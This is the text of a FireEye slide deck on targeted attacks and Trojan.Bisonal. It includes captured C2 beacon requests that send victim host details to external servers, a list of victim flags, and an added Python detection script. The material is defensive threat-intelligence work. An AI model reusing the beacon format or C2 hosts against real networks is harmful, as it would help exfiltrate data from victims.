Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1
Stopping Next-Gen Threats
Dan Walters – Sr. Systems Engineer Mgr.
"We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security
Tech Week Europe, September 28th 2012
High Profile APT Attacks Are Increasingly Common
The Attack Lifecycle – Multiple Stages
(Diagram: an IPS at the DMZ boundary, internal hosts, File Share 1 and File Share 2; the numbered stages cross the DMZ.)
1 Exploitation of system, via a compromised web server or Web 2.0 site
2 Malware binary download
3 Callbacks and control established with the callback server
Crimeware == for the $
Advanced Persistent Threat == Human
This is Alex == FireEye Research
The Usual Suspects
Organized…Persistent…
Reconnaissance made easy…
The Exploit
LaserMotive
CEOs are targeted
Could you stop this?
The Callback
Hidden in plain view…
Blog Post?
RSS Feed?
We’re Only Human
HR staff make easy targets
Just doing my job…
NATO is a frequent spearphish target
Global Unrest
Whose oil is it?
The curious case of Trojan.Bisonal
• Targets Japanese organizations exclusively (100% of observed targets)
• Delivered via weaponized Word (.doc) and Excel (.xls) files
• Embeds a per-target identifier (a short tag naming the target organization) into its command-and-control traffic
Custom “flag” and C2 domain
The first request is the beacon: the infected host reports its flag, hostname, IP and OS in a custom User-Agent. The same flag value (khi) then reappears as the leftmost label of the second C2 hostname, khi.acmetoy.com, behind an ordinary-looking Internet Explorer User-Agent.
GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy:
Host: online.cleansite.us
Cache-Control: no-cache

GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com
Connection: Keep-Alive
Other “flag” values seen
• flag:410maff <-- Ministry of Agriculture, Forestry and Fisheries
• flag:1223
• Flag:712mhi <-- Mitsubishi Heavy Industries
• Flag:727x
• Flag:8080
• Flag:84d
• flag:boat
• Flag:d2
• Flag:dick
• flag:jsexe
• flag:jyt
• Flag:m615
• flag:toray
• Flag:MARK 1
• flag:nec01 <-- NEC Corporation
• Flag:qqq
• flag:nids <-- National Institute for Defense Studies (nids.go.jp)
• flag:nsc516 <-- Nippon Steel Corporation
• flag:ihi <-- IHI Corporation
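As an added example (not FireEye's code and not part of the original slides), the following Python script turns the two captured requests and the flag list into detection logic: it parses raw HTTP requests, matches the beacon User-Agent grammar and extracts the victim fields, and separately flags a request whose hostname reuses a known flag as its leftmost label under a parent domain already seen serving C2 (khi.acmetoy.com). The two malicious sample requests are reconstructed from the slides; the benign request, the C2 parent-domain watchlist and all function names are assumptions made for this example.

```python
"""Bisonal-style C2 beacon detection over raw HTTP requests.

Added example, not FireEye's code. Two indicators taken from the slides:
  1. a non-browser User-Agent of the form
     "flag:<tag> host:<name> IP:<addr> OS:<ver> vm:<..> proxy:<..>"
  2. a C2 hostname whose leftmost label is an observed flag, under a parent
     domain already seen serving C2 (e.g. khi.acmetoy.com)
"""
import re
from typing import Dict, List, Optional

# Flags from the "Other flag values seen" slide, case preserved as observed.
# Values are the organisations the slide annotates; None where it gave none.
KNOWN_FLAGS: Dict[str, Optional[str]] = {
    "khi": None,
    "410maff": "Ministry of Agriculture, Forestry and Fisheries",
    "1223": None, "712mhi": "Mitsubishi Heavy Industries", "727x": None,
    "8080": None, "84d": None, "boat": None, "d2": None, "dick": None,
    "jsexe": None, "jyt": None, "m615": None, "toray": None, "MARK 1": None,
    "nec01": "NEC Corporation", "qqq": None,
    "nids": "National Institute for Defense Studies",
    "nsc516": "Nippon Steel Corporation", "ihi": "IHI Corporation",
}

# Parent domains of the two C2 hosts on the slides. Assumption for the
# example: in production this would be your threat-intel watchlist.
C2_PARENTS = {"cleansite.us", "acmetoy.com"}

# Grammar of the beacon User-Agent. Each value runs up to the next "key:"
# token, so "host:Business IP:10.0.0.43" splits into host and IP correctly.
BEACON_UA = re.compile(
    r"^flag:(?P<flag>.*?)\s+host:(?P<host>.*?)\s+IP:(?P<ip>\S*)\s+"
    r"OS:(?P<os>\S*)\s+vm:(?P<vm>\S*)\s+proxy:(?P<proxy>\S*)\s*$"
)


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into request-line fields plus lower-cased headers."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, target, version = lines[0].split(" ", 2)
    req = {"method": method, "target": target, "version": version}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        req[name.strip().lower()] = value.strip()
    return req


def classify(raw: str) -> Optional[Dict[str, str]]:
    """Return a finding for a Bisonal-like request, or None for anything else."""
    req = parse_request(raw)
    host = req.get("host", "")
    m = BEACON_UA.match(req.get("user-agent", ""))
    if m:  # indicator 1: the structured beacon User-Agent
        flag = m.group("flag")
        return {"indicator": "beacon-ua", "flag": flag, "c2": host,
                "victim_host": m.group("host"), "victim_ip": m.group("ip"),
                "victim_os": m.group("os"),
                "org": KNOWN_FLAGS.get(flag) or "unknown"}
    # indicator 2: flag reused as the first DNS label, gated on a known C2
    # parent domain so short flags (d2, boat, 8080) do not hit ordinary hosts
    label, _, parent = host.lower().partition(".")
    if parent in C2_PARENTS:
        for flag in KNOWN_FLAGS:
            if label == flag.lower():
                return {"indicator": "flag-subdomain", "flag": flag, "c2": host,
                        "org": KNOWN_FLAGS.get(flag) or "unknown"}
    return None


def scan(requests: List[str]) -> List[Dict[str, str]]:
    """Run classify() over a batch and keep only the hits, in input order."""
    return [f for f in (classify(r) for r in requests) if f]


# Sample input: the first two requests are reconstructed from the slides,
# the third is a constructed benign request for contrast.
BEACON = """GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy:
Host: online.cleansite.us
Cache-Control: no-cache
"""
FOLLOWUP = """GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com
Connection: Keep-Alive
"""
BENIGN = """GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: www.example.com
Connection: Keep-Alive
"""

if __name__ == "__main__":
    for finding in scan([BEACON, FOLLOWUP, BENIGN]):
        print(finding)
```

The second indicator is deliberately gated on the parent domain: several observed flags (d2, boat, 8080, qqq) are ordinary-looking labels, and matching them as subdomains of arbitrary hosts would drown the signal in false positives. The beacon User-Agent, by contrast, is specific enough to alert on by itself, and the extracted victim_host and victim_ip tell the responder which machine to pull for analysis.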
China is not the only threat
Multi-Protocol, Real-Time VX Engine
PHASE 1: Multi-Protocol Object Capture
• Web MPS: aggressive capture, web object filter
• E-mail MPS: email attachments, URL analysis
PHASE 2: Virtual Execution Environments, mapped to the target OS and applications
Dynamic, real-time analysis produces:
• Exploit detection
• Malware binary analysis
• Cross-matrix of OS/apps
• Originating URL
• Subsequent URLs
• OS modification report
• C&C protocol descriptors
Thank You!
FireEye - Modern Malware Protection System